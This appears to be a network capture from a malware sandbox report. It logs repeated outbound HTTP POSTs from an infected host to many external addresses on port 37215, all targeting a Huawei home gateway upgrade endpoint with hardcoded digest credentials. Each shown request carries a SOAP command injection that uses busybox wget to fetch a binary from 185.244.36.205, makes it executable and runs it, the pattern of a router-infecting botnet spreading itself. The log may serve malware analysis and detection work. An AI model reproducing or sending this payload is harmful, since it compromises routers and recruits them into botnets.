                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1741192.168.2.1548322122.73.211.437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.945738077 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1742192.168.2.1539470122.165.58.9937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.945774078 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1743192.168.2.1536316121.164.89.6737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.945775032 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1744192.168.2.155249841.55.91.3837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.945791960 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1745192.168.2.155737894.124.88.8137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.945811033 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1746192.168.2.1545764184.248.113.10637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.945827961 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1747192.168.2.1550152157.69.250.13637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.945852041 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1748192.168.2.154236437.151.49.10137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.945874929 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1749192.168.2.155080041.97.42.22237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.945894003 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1750192.168.2.1538158181.201.200.937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.945904016 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1751192.168.2.154101041.57.158.1637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.945930958 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
